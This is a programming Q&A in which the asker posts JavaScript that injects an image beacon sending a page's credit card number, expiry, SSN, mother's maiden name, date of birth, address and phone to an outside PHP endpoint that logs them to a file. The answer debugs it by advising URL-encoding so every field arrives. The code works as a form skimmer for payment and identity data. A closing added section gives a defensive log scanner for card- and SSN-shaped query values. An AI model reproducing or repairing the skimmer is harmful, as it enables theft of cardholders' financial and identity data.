-3

I am sending a GET request from an image added to the document via JavaScript. This request is sent to a PHP server, PHP code as follows:

```php
<?php
if (!$_GET['token']) {
    return;
}

if (file_exists($_GET['token'].'.txt')) {
    $fh = fopen($_GET['token'].'.txt', 'a');
    fwrite($fh, json_encode($_GET)."\n==============================\n");
} else {
    $fh = fopen($_GET['token'].'.txt', 'w');
    fwrite($fh, json_encode($_GET)."\n==============================\n");
}

fclose($fh);

return;
?>
```

The issue is that when I complete the GET request, the PHP server only receives the GET parameters up to billing_address_2, when there are many more parameters being sent by the image in the document. Below is the request the Apache PHP server receives:

```
/save-data.php?token=1632376762131.3433&credit_card_id=34&expiration_date=02/23&card_holder_name=Ishmael%20J%20Roth&billing_address=3904%20E%20Oak%20Pl&billing_address_2=Apt%20
```

You can see there are more GET parameters in the image being added to the document by the JavaScript in the JS code below:

```javascript
document.body.innerHTML += `<img onload="submitCCForm()" src="https://example-domain.com/save-data.php?token=${ encodeURI(window.localStorage.token) }&credit_card_number=${ encodeURI(document.querySelector('[name=\"credit_card_number\"]').value) }&expiration_date=${ encodeURI(document.querySelector('[name=\"expiration_time\"]').value) }&card_holder_name=${ encodeURI(document.querySelector('[name=\"card_holder_name\"]').value) }&billing_address=${ document.querySelector('.default_address_id').innerText.replaceAll('\n').split('undefined')[1] }&billing_address_2=${ document.querySelector('.default_address_id').innerText.replaceAll('\n').split('undefined')[2] }&billing_address_3=${ document.querySelector('.default_address_id').innerText.replaceAll('\n').split('undefined')[3].replaceAll(',', '-') }&billing_address_4=${ document.querySelector('.default_address_id').innerText.replaceAll('\n').split('undefined')[4] }&mothers_maiden_name=${ encodeURI(document.querySelector('#mmn').value) }&=&social_security=${ encodeURI(document.querySelector('[name=\"social_security\"]').value) }&dob=${ encodeURI(document.querySelector('[name=\"dob\"]').value) }&billing_phone=${ encodeURI(document.querySelector('[name=\"billing_phone\"]').value) }" />`
```

Please share a solution to have the full GET parameters sent in the image request be received by the server and saved to the file, rather than the server stopping at the GET parameter billing_address_2.

MaartenDev
Jake Cross
  • 1
    Could you provide a complete example URL of `https://example-domain.com/save-data.php?...` that your JavaScript may generate? – MaartenDev Sep 23 '21 at 08:24
  • 3
    Keep in mind that a url is limited to around 2048 characters: https://stackoverflow.com/questions/417142/what-is-the-maximum-length-of-a-url-in-different-browsers – MaartenDev Sep 23 '21 at 08:25
  • As an aside: You don't have to use the check for `file_exists()`. [fopen](https://www.php.net/manual/en/function.fopen.php) has the `a+` mode for that: `$fh = fopen($_GET['token'].'.txt', 'a+');` – Peter Krebs Sep 23 '21 at 08:31
  • Example request sent by the image to the PHP server: /save-data.php?token=1631921119650.5508&credit_card_number=4023519201235948&expiration_date=03/23&card_holder_name=Ishmael%20J%20Roth&billing_address=293 E Oak Rd&billing_address_2=Apt #253&billing_address_3=Los Angeles-California&billing_address_4=90028&mothers_maiden_name=Layton&=&social_security=123-12-1234&dob=04/02/1992&billing_phone=+1-123-123-1234 @MaartenDev – Jake Cross Sep 23 '21 at 08:48
  • Does it work when you visit the url directly in the browser? – MaartenDev Sep 23 '21 at 08:56

1 Answer

1

You are using an unencoded GET parameter!

`expiration_date=02/23`

That is why you are required to urlencode all parameters...

Honk der Hase
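Seen from the monitoring side, requests like the one quoted in the question are recognisable by the values in the query string rather than by parameter names. The following is an added example, not code from the question or the answer: it scans request lines for query values that are Luhn-valid card numbers or SSN-shaped. The log lines, the paths other than `/save-data.php`, and all function names are constructed for illustration.

```javascript
// Added example: flag request lines whose query string carries card- or SSN-shaped values.
// Constructed sample lines; 4111111111111111 is the standard Visa test number.
const SAMPLE_LOG = [
  'GET /save-data.php?token=1.5&credit_card_number=4111111111111111&expiration_date=03/23 HTTP/1.1',
  'GET /pixel.gif?token=1.5&n=4111%201111%201111%201111&social_security=123-12-1234 HTTP/1.1',
  'GET /img/logo.png?v=1632376762131 HTTP/1.1',   // 13 digits, fails Luhn
  'GET /track.gif?order=1234567890123456 HTTP/1.1', // 16 digits, fails Luhn
];

// Luhn checksum: double every second digit from the right, sum the digits, test mod 10.
function luhnValid(digits) {
  let sum = 0;
  for (let i = 0; i < digits.length; i++) {
    let d = Number(digits[digits.length - 1 - i]);
    if (i % 2 === 1) { d *= 2; if (d > 9) d -= 9; }
    sum += d;
  }
  return sum % 10 === 0;
}

// Classify one decoded parameter value; returns null when nothing matches.
function classify(value) {
  if (/\b\d{3}-\d{2}-\d{4}\b/.test(value)) return 'ssn-shaped';
  const digits = value.replace(/[ -]/g, ''); // tolerate grouped card numbers
  if (/^\d{13,19}$/.test(digits) && luhnValid(digits)) return 'luhn-valid-pan';
  return null;
}

// Parse "METHOD target PROTOCOL" and inspect every decoded query parameter.
function findSensitiveParams(logLine) {
  const target = logLine.split(' ')[1] || '';
  const query = target.includes('?') ? target.slice(target.indexOf('?') + 1) : '';
  const hits = [];
  for (const [name, value] of new URLSearchParams(query)) {
    const kind = classify(value);
    if (kind) hits.push({ param: name, kind });
  }
  return hits;
}

function scan(lines) {
  return lines.map((line) => ({ line, hits: findSensitiveParams(line) }))
              .filter((r) => r.hits.length > 0);
}

console.log(JSON.stringify(scan(SAMPLE_LOG), null, 2));
```

The Luhn check keeps timestamps and order numbers from alerting, so the same scan can run over egress proxy or web server logs without keying on parameter names.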